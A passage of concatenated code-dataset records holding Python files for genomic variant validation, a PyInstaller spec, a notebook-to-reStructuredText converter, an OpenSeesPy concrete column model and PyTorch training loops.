variation.schemas.normalize_response_schema\\\n import HGVSDupDelMode as HGVSDupDelModeEnum\nfrom variation.vrs_representation import VRSRepresentation\nfrom variation.schemas.app_schemas import Endpoint\nfrom variation.schemas.validation_response_schema import ValidationSummary\nfrom variation.schemas.classification_response_schema import Classification\nfrom variation.tokenizers import GeneSymbol\nfrom .protein_substitution import ProteinSubstitution\nfrom .polypeptide_truncation import PolypeptideTruncation\nfrom .silent_mutation import SilentMutation\nfrom .coding_dna_substitution import CodingDNASubstitution\nfrom .coding_dna_silent_mutation import CodingDNASilentMutation\nfrom .genomic_silent_mutation import GenomicSilentMutation\nfrom .genomic_substitution import GenomicSubstitution\nfrom .protein_delins import ProteinDelIns\nfrom .coding_dna_delins import CodingDNADelIns\nfrom .genomic_delins import GenomicDelIns\nfrom .protein_deletion import ProteinDeletion\nfrom .coding_dna_deletion import CodingDNADeletion\nfrom .genomic_deletion import GenomicDeletion\nfrom .protein_insertion import ProteinInsertion\nfrom .coding_dna_insertion import CodingDNAInsertion\nfrom .genomic_insertion import GenomicInsertion\nfrom .genomic_uncertain_deletion import GenomicUncertainDeletion\nfrom .genomic_duplication import GenomicDuplication\nfrom .genomic_deletion_range import GenomicDeletionRange\nfrom .amplification import Amplification\n\n\nclass Validate:\n \"\"\"The validation class.\"\"\"\n\n def __init__(self, seqrepo_access: SeqRepoAccess,\n transcript_mappings: TranscriptMappings,\n gene_symbol: GeneSymbol,\n mane_transcript: MANETranscript,\n uta: UTADatabase, tlr: Translator,\n gene_normalizer: GeneQueryHandler, vrs: VRSRepresentation) -> None:\n \"\"\"Initialize the validate class.\n\n :param SeqRepoAccess seqrepo_access: Access to SeqRepo data\n :param TranscriptMappings transcript_mappings: Access to transcript\n mappings\n :param GeneSymbol gene_symbol: Gene symbol tokenizer\n :param MANETranscript mane_transcript: Access MANE Transcript\n information\n :param UTADatabase uta: Access to UTA queries\n :param Translator tlr: Class for translating nomenclatures to and from VRS\n :param GeneQueryHandler gene_normalizer: Access to gene-normalizer\n :param VRSRepresentation vrs: Class for representing VRS objects\n \"\"\"\n params = [\n seqrepo_access, transcript_mappings, gene_symbol,\n mane_transcript, uta, tlr, gene_normalizer, vrs\n ]\n self.validators = [\n ProteinSubstitution(*params),\n PolypeptideTruncation(*params),\n SilentMutation(*params),\n CodingDNASubstitution(*params),\n GenomicSubstitution(*params),\n CodingDNASilentMutation(*params),\n GenomicSilentMutation(*params),\n ProteinDelIns(*params),\n CodingDNADelIns(*params),\n GenomicDelIns(*params),\n ProteinDeletion(*params),\n CodingDNADeletion(*params),\n GenomicDeletion(*params),\n ProteinInsertion(*params),\n CodingDNAInsertion(*params),\n GenomicInsertion(*params),\n GenomicDeletionRange(*params),\n GenomicUncertainDeletion(*params),\n GenomicDuplication(*params),\n Amplification(*params)\n ]\n\n async def perform(\n self, classifications: List[Classification],\n endpoint_name: Optional[Endpoint] = None, warnings: List = None,\n hgvs_dup_del_mode: HGVSDupDelModeEnum = HGVSDupDelModeEnum.DEFAULT,\n baseline_copies: Optional[int] = None,\n copy_change: Optional[CopyChange] = None,\n do_liftover: bool = False\n ) -> ValidationSummary:\n \"\"\"Validate a list of classifications.\n\n :param List classifications: List of classifications\n :param Optional[Endpoint] endpoint_name: Then name of the endpoint being used\n :param List warnings: List of warnings\n :param HGVSDupDelModeEnum hgvs_dup_del_mode: Must be: `default`,\n `copy_number_count`, `copy_number_change`, `repeated_seq_expr`,\n `literal_seq_expr`. This parameter determines how to represent HGVS dup/del\n expressions as VRS objects.\n :param Optional[int] baseline_copies: Baseline copies number\n :param Optional[CopyChange] copy_change: The copy change\n :param bool do_liftover: Whether or not to liftover to GRCh38 assembly\n :return: ValidationSummary containing valid and invalid results\n \"\"\"\n valid_possibilities = list()\n invalid_possibilities = list()\n if not warnings:\n warnings = list()\n\n found_valid_result = False\n invalid_classifications = set()\n for classification in classifications:\n for validator in self.validators:\n if validator.validates_classification_type(\n classification.classification_type):\n results = await validator.validate(\n classification, hgvs_dup_del_mode=hgvs_dup_del_mode,\n endpoint_name=endpoint_name, baseline_copies=baseline_copies,\n copy_change=copy_change,\n do_liftover=do_liftover)\n for res in results:\n if res.is_valid:\n found_valid_result = True\n valid_possibilities.append(res)\n else:\n invalid_possibilities.append(res)\n invalid_classifications.add(\n classification.classification_type.value)\n\n if found_valid_result:\n break\n\n if not found_valid_result and not warnings:\n warnings.append(f\"Unable to find valid result for classifications: \"\n f\"{invalid_classifications}\")\n\n return ValidationSummary(\n valid_results=valid_possibilities,\n invalid_results=invalid_possibilities,\n warnings=warnings\n )\n","sub_path":"variation/validators/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":6634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"292820579","text":"# -*- mode: python ; coding: utf-8 -*-\n\nblock_cipher = None\n\noptions = [ ('v', None, 'OPTION')]\na = Analysis(['AcademicTime.py', 'AppliedSeriesChoicePage.py', 'Course.py', 'CourseSelectPage.py', 'InterestSelectPage.py', 'MajorSelectPage.py', 'MultiPageApp.py', 'ScheduleBlock.py', 'ScheduleDisplayPage.py', 'Schedule.py', 'Student.py'],\n pathex=['C:\\\\Users\\\\gabri\\\\PycharmProjects\\\\ScheduleBotPy'],\n binaries=[],\n datas=[('database/*', 'database')],\n hiddenimports=['psycopg2'],\n hookspath=[],\n runtime_hooks=[],\n excludes=[],\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher,\n noarchive=False)\npyz = PYZ(a.pure, a.zipped_data,\n cipher=block_cipher)\nexe = EXE(pyz,\n a.scripts,\n a.binaries,\n a.zipfiles,\n a.datas,\n [],\n name='ScheduleBotWINDOWS',\n debug=False,\n bootloader_ignore_signals=False,\n strip=False,\n upx=True,\n upx_exclude=[],\n runtime_tmpdir=None,\n console=False )\n","sub_path":"ScheduleBotWINDOWS.spec","file_name":"ScheduleBotWINDOWS.spec","file_ext":"spec","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"190993604","text":"#!/usr/bin/env python\n# Version 0.04 for Pandoc\n\n\"\"\"A simple python script that removes spaces before and \nafter dollar signs in inline Latex code inside .ipynb files\nand also produce a .rst file from the new .ipynb file by Using `Pandoc`\n\"\"\"\n\nimport os\nimport sys\nimport argparse # clear\nimport re\n\ndef main(arguments):\n\n parser = argparse.ArgumentParser(\n description=__doc__, # text to display before the argument help\n formatter_class=argparse.RawDescriptionHelpFormatter) \n parser.add_argument('infile', help=\"Input file\", type=argparse.FileType('r'))\n parser.add_argument('-m', '--median', help=\"Intermediate Output file\",\n default=sys.stdout, type=argparse.FileType('w+'))\n parser.add_argument('-o', '--outfile', help=\"Output file\",\n default=sys.stdout, type=argparse.FileType('w+'))\n args = parser.parse_args(arguments)\n #improve navigation and error catching to file in case user includes directory not in home of file\n with args.infile as f:\n content=f.read()\n with args.median as new_f:\n new_content=content\n new_content=re.sub(r'(\\$.*)\\s(\\$)',r'\\1\\2', new_content)\n new_content=re.sub(r'(\\$)\\s(.*\\$)',r'\\1\\2', new_content)\n new_f.write(new_content)\n os.system('pandoc -f ipynb -t rst %s -o %s' % (args.median.name, args.outfile.name))\nif __name__ == '__main__':\n sys.exit(main(sys.argv[1:]))\n","sub_path":"i2r_p.py","file_name":"i2r_p.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"602801816","text":"import openseespy.opensees as ops\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom openseespy.postprocessing.Get_Rendering import plot_model\nfrom PIL import Image\nimport matplotlib.image as mpimg\nimport os\nfrom pathlib import Path\n\n\nclass Tanaka_Park():\n\n \n FC=27200\n REC=0.028 \n SUP_INF=4\n DER_INF=5\n E_ELASTIC=200000000\n\n #RECODERS\n FILE_DESPLAZAMIENTO = \"DESPLAZAMIENTO_1.out\" # DESPLAZAMIENTO\n FILE_REAC_BASE = \"REAC_BASE.out\" # REACCION_BASE\n FILE_INTER_ENS = \"INTERSECCION_ENSA_FISI.out\" # INTERSECCION DE COMPARACION DE LOS ENSAYOS REALIZADOS\n\n def __init__(self,nombre='BasicBuilder',numero_dimensiones=2, numero_dots=3, data_file='Tanaka and Park 1990, Nº5.txt', altura_columna=2.335, tipo_concreto=1, tipo_refuerzo=2 ,dim_travs_colum_altura=0.55, dim_trav_colum_base=0.55, data_file_lab='Tanaka_Park.txt', calculo='*'):\n \n self.nombre = nombre\n self.numero_dimensiones = numero_dimensiones\n self.numero_dots = numero_dots \n self.data_file = data_file\n self.tipo_concreto = tipo_concreto\n self.tipo_refuerzo = tipo_refuerzo\n\n #Datos de la Estructura\n self.altura_columna = altura_columna \n self.dim_travs_colum_altura = dim_travs_colum_altura\n self.dim_trav_colum_base = dim_trav_colum_base\n self.data_file_lab = data_file_lab\n self.data_file_lab = data_file_lab\n self.calculo = calculo\n \n ops.wipe()\n ops.model(self.nombre, \"-ndm\", self.numero_dimensiones, \"-ndf\", self.numero_dots)\n\n def construir_modelo(self):\n \n fc=32000\n fyu_01=429000\n fyu=675000\n rec=0.04\n dia_estr=0.012\n Esp_estr=0.11\n nvsx=2\n nvsy=2\n dia_varcol=20 #int(input(\"Ingrese el diametro de la varilla de refuerzo para la columna: \"))\n var_sup_inf=4\n var_der_izq=4\n areaFiber=((np.pi*dia_varcol**2)/4)/1000**2\n\n #Definir los nodos de la estructura\n ops.node(1, 0, 0)\n ops.node(2, 0, 1.65)\n\n #Restricciones \n ops.fix(1, 1, 1, 1)\n\n # Definir los materiales para la columna\n # ------------------------------------------\n # CONCRET0 \n \n if self.tipo_concreto == 1:\n # Concreto no confinado\n fpc=-fc\n epsc0=-0.002\n fpcu=0.8*fc\n epsU=-0.004\n ops.uniaxialMaterial(\"Concrete01\", 2 , -fpc , -epsc0 , -fpcu , -epsU)\n\n #Concreto Confinado\n esm=1\n Ec=(4700*(fc/1000)**0.5)*1000\n sp=Esp_estr-dia_estr\n rs=(nvsx*dia_estr**2*0.875*(self.dim_trav_colum_base-2*rec)+nvsy*dia_estr**2*0.875*(self.dim_travs_colum_altura-2*rec))/((self.dim_trav_colum_base-2*rec)*(self.dim_travs_colum_altura-2*rec)*Esp_estr)\n areaFiber=((np.pi*dia_varcol**2)/4)/1000**2\n area_conf=(self.dim_trav_colum_base-2*rec)*(self.dim_travs_colum_altura-2*rec)\n rcc=areaFiber*(2*var_sup_inf+2*var_der_izq)/area_conf\n wi=0.2\n ke=((1-wi**2/(6*area_conf))*(1-Esp_estr/(2*self.dim_trav_colum_base))*(1-Esp_estr/(2*self.dim_travs_colum_altura)))/(1-rcc)\n fpl=1/2*ke*rs*fyu_01\n fpcc=(-1.254+2.254*(1+7.94*fpl/fc)**0.5-2*fpl/fc)*fc\n ecc=epsc0*(1+5*(fpcc/fc-1))\n Esec=fpcc/ecc\n r=Ec/(Ec-Esec)\n ecu=1.5*(0.004+1.4*rs*fyu_01*esm/fpcc)\n fcu=0.8*fpcc\n ops.uniaxialMaterial(\"Concrete01\", 1, -fpcc , -ecc , -fcu , -ecu)\n\n elif self.tipo_concreto == 2:\n # Concreto inconfinado\n fpc=-fc\n epsc0=-0.003\n fpcu=0.8*fc\n epsU=-0.006\n lambdaC=0.5\n ft=(0.62*(fc)**0.5)\n Ets=0.1*(2*(fc)/epsc0)\n\n ops.uniaxialMaterial(\"Concrete02\", 2 , -fc , epsc0 , fpcu , epsU , lambdaC , ft , Ets)\n\n # Concreto confinado\n\n #Columnas\n\n fcc=1.35*fc\n epscc0=-0.003\n fpccu=0.8*fc\n epscU=-0.006\n\n ops.uniaxialMaterial(\"Concrete02\", 1 , -fcc , epscc0 , fpccu , epscU , lambdaC , ft , Ets)\n \n elif self.tipo_concreto == 3:\n # Concreto inconfinado\n fpc=-fc\n epsc0=-0.003\n fpcu=0.8*fc\n epsU=-0.006\n endStrainSITC=0.03\n\n ops.uniaxialMaterial(\"Concrete01WithSITC\", 2 , -fc , epsc0 , fpcu , epsU, endStrainSITC)\n\n # Concreto confinado\n\n #Columnas\n\n fcc=-1.35*fc\n epsc0=-0.003\n fpcu=0.8*fc\n epsU=-0.006\n endStrainSITC=0.03\n\n ops.uniaxialMaterial(\"Concrete01WithSITC\", 1 , -fcc , epsc0 , fpcu , epsU , endStrainSITC)\n \n else:\n \n print(\"No se encontro el concreto a utilizar\")\n\n #Material Elástico del Concreto\n E_elastic=20000000\n ops.uniaxialMaterial(\"Elastic\", 3, E_elastic)\n\n #Acero de refuerzo\n \n if self.tipo_refuerzo==1:\n Fy=511000\n Fyu=fyu\n E0=200000000\n b=0.0179\n ops.uniaxialMaterial(\"Steel01\", 4, Fy, E0, b)\n \n elif self.tipo_refuerzo==2:\n Fy=511000\n Fyu=fyu\n E0=200000000\n b=0.0179\n R0=15\n cR1=0.925\n cR2=0.15\n a1=0\n a2=1\n a3=0\n a4=1\n ops.uniaxialMaterial(\"Steel02\", 4, Fy, E0, b, R0, cR1, cR2, a1, a2, a3, a4)\n\n else: \n print(\"No se encontro el acero de refuerzo a utilizar\")\n\n #Definir las etiquetas de secciones\n col_sec=1\n\n #Creacion de las secciones\n ops.section(\"Fiber\", col_sec)\n\n y0=(self.dim_travs_colum_altura/2)-rec\n z0=(self.dim_trav_colum_base/2)-rec\n\n #Fibra del Concreto Confinado\n Eti_quad_conf=1\n numSubdivIJ=10\n numSubdivJK=10\n crdsI=[y0, z0]\n crdsJ=[y0, -z0]\n crdsK=[-y0, -z0]\n crdsL=[-y0, z0]\n ops.patch(\"quad\", Eti_quad_conf, numSubdivIJ, numSubdivJK, *crdsI , *crdsJ , *crdsK , *crdsL)\n\n #Fibra del Concreto no Confinado\n y1=self.dim_travs_colum_altura/2\n z1=self.dim_trav_colum_base/2\n\n Eti_quad_noconf=2\n numSubdivIJ=1\n numSubdivJK=4\n crdsI=[y1, z1]\n crdsJ=[-y1, z1]\n crdsK=[y1, z0]\n crdsL=[-y1, z0]\n ops.patch(\"quad\", Eti_quad_noconf, numSubdivIJ, numSubdivJK, * crdsI , * crdsJ , * crdsK , * crdsL)\n\n crdsI=[y1, -z1]\n crdsJ=[-y1, -z1]\n crdsK=[-y1, -z0]\n crdsL=[y1, -z0]\n ops.patch(\"quad\", Eti_quad_noconf, numSubdivIJ, numSubdivJK, * crdsI , * crdsJ , * crdsK , * crdsL)\n\n crdsI=[y1, z0]\n crdsJ=[y1, -z0]\n crdsK=[y0, -z0]\n crdsL=[y0, z0]\n ops.patch(\"quad\", Eti_quad_noconf, numSubdivIJ, numSubdivJK, * crdsI , * crdsJ , * crdsK , * crdsL)\n\n crdsI=[-y1, -z0]\n crdsJ=[-y1, z0]\n crdsK=[-y0, z0]\n crdsL=[-y0, -z0]\n ops.patch(\"quad\", Eti_quad_noconf, numSubdivIJ, numSubdivJK, * crdsI , * crdsJ , * crdsK , * crdsL)\n\n #Definir el acero longitudinal\n matTag=4\n #Definir acero longitudinal superior\n numFiber=var_sup_inf\n start=[y0, z0]\n end=[y0, -z0]\n ops.layer(\"straight\", matTag, numFiber, areaFiber, *start, *end)\n\n #Definir acero longitudinal inferior\n numFiber=var_sup_inf\n start=[-y0, z0]\n end=[-y0, -z0]\n ops.layer(\"straight\", matTag, numFiber, areaFiber, *start, *end)\n\n #Definir acero longitudinal derecha\n numFiber=var_der_izq\n start=[y0, z0]\n end=[-y0, z0]\n ops.layer(\"straight\", matTag, numFiber, areaFiber, *start, *end)\n\n #Definir acero longitudinal izquierda\n numFiber=var_der_izq\n start=[y0, -z0]\n end=[-y0, -z0]\n ops.layer(\"straight\", matTag, numFiber, areaFiber, *start, *end)\n\n #Definir agregador de sección \n Eti_Agr=2\n ops.section(\"Aggregator\", Eti_Agr, 3, \"Vy\", \"-section\", col_sec)\n\n #Definir la transformacion de coordenadas\n eti_Transf=1\n ops.geomTransf(\"Linear\", eti_Transf)\n\n #Definir los elementos de la columna\n Eti_beam=1\n N=2\n ops.beamIntegration(\"Lobatto\", Eti_beam, Eti_Agr, N )\n eleTag=1\n eleNodes=[1, 2]\n ops.element(\"dispBeamColumn\", eleTag, * eleNodes, eti_Transf, Eti_beam)\n\n #Definir el recorder\n nodo=2\n dof=1\n ops.recorder(\"Node\", \"-file\", self.FILE_INTER_ENS, \"-time\", \"-node\", nodo, \"-dof\", dof, \"disp\")\n ops.recorder(\"Node\", \"-file\", self.FILE_DESPLAZAMIENTO, \"-time\", \"-node\", 2, \"-dof\", 1, 2, 3, \"disp\")\n ops.recorder(\"Node\", \"-file\", self.FILE_REAC_BASE, \"-time\", \"-node\", 1, \"-dof\", 1, 2, 3, \"reaction\")\n\n #Definir los patrones de carga\n ops.timeSeries(\"Constant\", 1)\n ops.pattern(\"Plain\", 1, 1)\n ops.load(nodo, 0.0, -968, 0.0)\n\n # Definir los parametros de analisis\n ops.integrator(\"LoadControl\", 0)\n ops.system(\"SparseGeneral\", \"-piv\")\n ops.test(\"NormDispIncr\", 1.0e-4, 2000)\n ops.constraints(\"Plain\")\n ops.numberer(\"Plain\")\n ops.algorithm(\"KrylovNewton\")\n ops.analysis(\"Static\")\n\n ok=ops.analyze(1)\n if ok==0:\n print(\"CARGA AXIAL APLICADA\")\n else:\n print(\"ERROR AL APLICAR LA CARGA AXIAL\")\n ops.wipeAnalysis()\n\n if ok==0:\n \n # Definir patron de carga\n ops.timeSeries(\"Linear\", 2)\n ops.pattern(\"Plain\", 2, 2)\n ops.load(nodo, 1, 0.0, 0.0)\n \n #Definir los nodos de la estructura\n nodos=np.loadtxt(self.data_file)\n num_nodos=len(nodos)\n\n for i in range(len(nodos)):\n x=float(nodos[i])\n\n ops.integrator(\"DisplacementControl\", nodo, dof, x)\n ops.analysis(\"Static\")\n ops.analyze(1)\n\n ops.wipeAnalysis()\n ops.remove(\"recorders\")\n \n #Personalizar la carga de los datos\n \n serie_total= [] \n\n if self.calculo == 'REACCION_BASE' : \n array_mek=np.loadtxt(self.FILE_REAC_BASE)\n self.construye_figura(array_mek,serie=[1,2,3], recoder=self.calculo) \n\n\n elif self.calculo == 'DESPLAZAMIENTO_1': \n array_mek=np.loadtxt(self.FILE_DESPLAZAMIENTO)\n self.construye_figura(array_mek,serie=[1,2,3], recoder=self.calculo)\n\n else: \n datos_1=np.loadtxt(self.FILE_REAC_BASE) \n datos_2=np.loadtxt(self.FILE_INTER_ENS) \n datos_3=np.loadtxt(self.FILE_DESPLAZAMIENTO)\n\n serie_total = [[ datos_1, [1,2,3],'REACCION_BASE' ], [ datos_2, [1], 'INTERSECCION' ], [ datos_3, [1,2,3],'DESPLAZAMIENTO' ], ]\n #self.construye_figura(serie_total=serie_total, recoder='*')\n \n nodo=[1, 2]\n dof=[1, 2, 3]\n\n nodo1=nodo[0]\n nodo2=nodo[1]\n\n gra_liber1=dof[0]\n gra_liber2=dof[1]\n gra_liber3=dof[2]\n\n #Resultados\n\n RESULTADOS = []\n\n RESULTADOS.append(str(\"El desplazamiento en el nodo: \" + str(nodo2)+ \" para el grado de libertad: \"+str(gra_liber1)+\" es: \"+str(ops.nodeDisp(2, 1))+\" m\") ) \n RESULTADOS.append(str(\"El desplazamiento en el nodo: \" + str(nodo2)+ \" para el grado de libertad: \"+str(gra_liber2)+\" es: \"+str(ops.nodeDisp(2, 2))+\" m\") ) \n RESULTADOS.append(str(\"El desplazamiento en el nodo: \" + str(nodo2)+ \" para el grado de libertad: \"+str(gra_liber3)+\" es: \"+str(ops.nodeDisp(2, 3))+\" m\") ) \n\n RESULTADOS.append(str(\"La reaccción en el nodo: \" + str(nodo1)+ \" para el grado de libertad: \"+str(gra_liber1)+\" es: \"+str(ops.nodeReaction(1, 1))+\" N\" ))\n RESULTADOS.append(str(\"La reaccción en el nodo: \" + str(nodo1)+ \" para el grado de libertad: \"+str(gra_liber2)+\" es: \"+str(ops.nodeReaction(1, 2))+\" N\") )\n RESULTADOS.append(str(\"La reaccción en el nodo: \" + str(nodo1)+ \" para el grado de libertad: \"+str(gra_liber3)+\" es: \"+str(ops.nodeReaction(1, 3))+\" N\") )\n\n RESULTADOS.append(str(\"La reaccción en el elemento: \"+ str(nodo1)+ \" para el grado de libertad:\"+ str(gra_liber1)+\" es:\"+str(ops.nodeReaction(1, 1))+\" N\"))\n\n if serie_total:\n self.construye_figura(serie_total=serie_total, recoder='*', resultados=RESULTADOS)\n\n self.mostrar_resultados(lista_mensajes=RESULTADOS) \n\n\n #Este el el modelo realizado en el laboratorio \n self.construye_figura([array_mek, array_mek_lab])\n\n\n def construye_figura(self, array_mek=None, serie=[], recoder=None, serie_total=[], resultados=[]):\n \n \"\"\"Construye una figura basado en un array de datos, una serie de gráficos \n \"\"\"\n \n titulo = None \n \n if recoder != '*':\n\n ventana_principal = plt.figure(0)\n ventana_principal.canvas.set_window_title(recoder)\n\n for i in serie:\n plt.subplots_adjust(hspace=0.70)\n plt.subplot(2,2,i)\n titulo = \"RESPUESTA : GRADO DE LIBERTAD #{}\".format(i) \n plt.title(titulo) \n plt.xlabel('Tiempo (seg)')\n plt.ylabel('Desplazamiento (m)')\n print (\"Normal :\",i)\n plt.plot(array_mek[:,0], array_mek[:,i],label=\"Resultado\")\n plt.legend() \n else :\n \n from PIL import Image\n import matplotlib.image as mpimg\n import os\n from pathlib import Path\n \n BASE_DIR = Path(__file__).resolve().parent.parent\n\n IMAGEN_COLUMNA = os.path.join(os.path.join(BASE_DIR,'modelos'), 'Carga_ciclica_01.jpeg')\n\n pil_img = Image.open(IMAGEN_COLUMNA)\n\n\n num_subplots = 0\n \n for elemento in serie_total:\n num_subplots += len(elemento[1]) \n \n if num_subplots % 2 != 0:\n num_subplots+=1\n \n fig = plt.figure()\n\n\n FILAS = 3\n COLUMNAS = 3\n ax1 = plt.subplot2grid((FILAS, COLUMNAS), (0, 0), rowspan=2)\n ax2 = plt.subplot2grid((FILAS, COLUMNAS), (2, 0))\n ax3 = plt.subplot2grid((FILAS, COLUMNAS), (0, 1))\n ax4 = plt.subplot2grid((FILAS, COLUMNAS), (1, 1))\n ax5 = plt.subplot2grid((FILAS, COLUMNAS), (2, 1))\n ax6 = plt.subplot2grid((FILAS, COLUMNAS), (0, 2))\n ax7 = plt.subplot2grid((FILAS, COLUMNAS), (1, 2))\n ax8 = plt.subplot2grid((FILAS, COLUMNAS), (2, 2))\n \n #Para controlar el subplot de Resultados se visualice\n if COLUMNAS == 4: \n ax9 = plt.subplot2grid((3,4), (0, 3), rowspan=3)\n \n\n for columna, elemento in enumerate(serie_total): \n \n array_mek = elemento[0]\n serie = elemento[1]\n calculo_var = elemento[2]\n \n if calculo_var == 'REACCION_BASE': \n \n ax3.plot(array_mek[:,0], array_mek[:,serie[0]],'tab:orange')\n ax3.set_title(f\" {calculo_var}\\nGRADO DE LIBERTAD # {serie[0]}\", fontsize=8)\n ax3.set_xlabel('Fuerza (kN)')\n ax3.set_ylabel('Desplazamiento (mm)')\n \n ax4.plot(array_mek[:,0], array_mek[:,serie[1]],'tab:orange')\n ax4.set_title(f\" {calculo_var}\\nGRADO DE LIBERTAD # {serie[1]}\", fontsize=8)\n ax4.set_xlabel('Fuerza (kN)')\n ax4.set_ylabel('Desplazamiento (mm)')\n \n ax5.plot(array_mek[:,0], array_mek[:,serie[2]],'tab:orange')\n ax5.set_title(f\" {calculo_var}\\nGRADO DE LIBERTAD # {serie[2]}\", fontsize=8)\n ax5.set_xlabel('Fuerza (kN)')\n ax5.set_ylabel('Desplazamiento (mm)')\n\n elif calculo_var == 'INTERSECCION':\n \n ax1.imshow(pil_img) \n ax1.set_title(f\" ENSAYO POR CARGA CÍCLICA\", fontsize=8)\n ax1.axes.xaxis.set_visible(False)\n ax1.axes.yaxis.set_visible(False)\n\n #ax4.plot(array_mek[0][:,1], array_mek[0][:,0],'tab:orange')\n ens_opensees=np.loadtxt(self.FILE_INTER_ENS)\n ens_lab=np.loadtxt(self.data_file_lab)\n ax2.plot(ens_opensees[:,1], ens_opensees[:,0],'tab:green')\n ax2.plot(ens_lab[:,0], ens_lab[:,1],'tab:orange')\n ax2.set_title(f\" INTERSECCIÓN DE ENSAYOS\", fontsize=10)\n ax2.set_xlabel('Desplazamiento (m)')\n ax2.set_ylabel('Fuerza (kN)')\n\n\n else:\n\n ax6.plot(array_mek[:,0], array_mek[:,serie[0]],'tab:red')\n ax6.set_title(f\" {calculo_var}\\nGRADO DE LIBERTAD # {serie[0]}\", fontsize=8)\n ax6.set_xlabel('Fuerza (kN)')\n ax6.set_ylabel('Desplazamiento (m)')\n \n ax7.plot(array_mek[:,0], array_mek[:,serie[1]],'tab:red')\n ax7.set_title(f\" {calculo_var}\\nGRADO DE LIBERTAD # {serie[1]}\", fontsize=8)\n ax7.set_xlabel('Fuerza (kN)')\n ax7.set_ylabel('Desplazamiento (m)')\n\n ax8.plot(array_mek[:,0], array_mek[:,serie[2]],'tab:red')\n ax8.set_title(f\" {calculo_var}\\nGRADO DE LIBERTAD # {serie[2]}\", fontsize=8)\n ax8.set_xlabel('Fuerza (kN)')\n ax8.set_ylabel('Desplazamiento (m)') \n \n if COLUMNAS == 4:\n self.mostrar_resultados(lista_mensajes=resultados,ax=ax9)\n\n fig.suptitle(\"MODELOS MATEMÁTICOS: ENSAYOS FISICOS\") \n fig.subplots_adjust(left=0.05, bottom=0.076, right=0.971, top=0.88, wspace=0.562, hspace=1)\n \n mng = plt.get_current_fig_manager()\n mng.set_window_title(\"MODELOS MATEMÁTICOS UTPL\")\n mng.resize(*mng.window.maxsize()) \n plt.show() \n\n ","sub_path":"ensayos/tanaka_park.py","file_name":"tanaka_park.py","file_ext":"py","file_size_in_byte":18736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"98113345","text":"from typing import Optional, Dict, Any, Tuple\n\nimport torch\nimport torch.optim\nimport torch.utils.data.dataloader\nimport torch.utils.tensorboard.writer\n\n\ndef train_loop(model: torch.nn.Module,\n loss_func: torch.nn.Module,\n dataloader: torch.utils.data.dataloader.DataLoader,\n epoch: int,\n iteration: int,\n optimizer: Any, # from torch.optim (i.e. Adam, SGD, ...)\n scheduler: Any, # from torch.optim.lr_scheduler (i.e. MultiStepLR)\n writer: Optional[torch.utils.tensorboard.writer.SummaryWriter] = None,\n device: torch.device = torch.device(\"cuda\")) -> Tuple[float, int]:\n \"\"\" Training loop\n Implements the forward + backward pass for each sample and obtains the loss on the training data\n \"\"\"\n model.train()\n\n train_running_loss = 0.0\n train_loss_dict = None if writer is None else loss_dict()\n\n for sample in dataloader:\n optimizer.zero_grad()\n\n loss_sample = forward_pass(model, sample, device)\n\n loss = loss_func(loss_sample, train_loss_dict)\n train_running_loss += loss.item()\n loss.backward()\n\n # If we want gradient clipping:\n # clipping_value = 1 # arbitrary value of your choosing\n # torch.nn.utils.clip_grad_value_(model.parameters(), clipping_value)\n optimizer.step()\n\n scheduler.step()\n iteration += 1\n\n train_loss = train_running_loss / len(dataloader)\n\n if writer is not None:\n writer.add_scalar('train loss', train_loss, epoch)\n\n for key, value in train_loss_dict.items():\n writer.add_scalar(key + '_train', value / len(dataloader), epoch)\n\n return train_loss, iteration\n\n\ndef val_loop(model: torch.nn.Module,\n loss_func: torch.nn.Module,\n dataloader: torch.utils.data.dataloader.DataLoader,\n epoch: int,\n writer: Optional[torch.utils.tensorboard.writer.SummaryWriter] = None,\n device: torch.device = torch.device(\"cuda\"),\n dataset_type: str = 'val') -> float:\n \"\"\" Validation loop (no backprop)\n Obtains the loss on the validation (or test) data\n \"\"\"\n model.eval()\n\n val_running_loss = 0.0\n val_loss_dict = loss_dict()\n\n # Get val data loss\n for sample in dataloader:\n with torch.no_grad():\n loss_sample = forward_pass(model, sample, device)\n\n loss = loss_func(loss_sample, val_loss_dict)\n\n val_running_loss += loss.item()\n\n val_loss = val_running_loss / len(dataloader)\n\n if writer is not None:\n writer.add_scalar('val loss'.format(dataset_type), val_loss, epoch)\n\n for key, value in val_loss_dict.items():\n writer.add_scalar('{}_{}'.format(key, dataset_type), value / len(dataloader), epoch)\n\n return val_loss\n\n\ndef forward_pass(model: torch.nn.Module,\n sample: Dict[str, torch.Tensor],\n device: torch.device) -> Dict[str, torch.Tensor]:\n \"\"\" Forward pass of the network for a given sample\n \"\"\"\n img = sample['img'].to(device)\n bboxes = sample['bboxes'].to(device)\n labels = sample['labels'].to(device)\n bboxes_mask = sample['bboxes_mask'].to(device)\n\n # Forward pass\n ploc, plabel, *aux_out = model(img)\n\n # Create the loss sample\n loss_sample = {}\n loss_sample['ploc'] = ploc\n loss_sample['plabel'] = plabel\n loss_sample['bboxes'] = bboxes\n loss_sample['labels'] = labels\n loss_sample['bboxes_mask'] = bboxes_mask\n\n # Check if we should include auxiliary\n if sample['auxiliary'].all() and aux_out is not None:\n loss_sample['scene_gt'] = sample['scene_id'].to(device)\n loss_sample['scene_pred'] = aux_out[0]\n\n loss_sample['depth_gt'] = sample['depth'].to(device)\n loss_sample['depth_pred'] = aux_out[1]\n\n loss_sample['normals_gt'] = sample['normals'].to(device)\n loss_sample['normals_mask'] = sample['normals_mask'].to(device)\n loss_sample['normals_pred'] = aux_out[2]\n\n return loss_sample\n\n\ndef loss_dict() -> Dict[str, float]:\n \"\"\" Initialize loss dictionary for network sub-tasks\n \"\"\"\n\n # Add z in front of each key name so they appear on the bottom (and together) in tensorboard\n d = {'z_normals_loss': 0.0, 'z_scene_loss': 0.0, 'z_depth_loss': 0.0, 'z_conf_loss': 0.0, 'z_loc_loss': 0.0}\n return 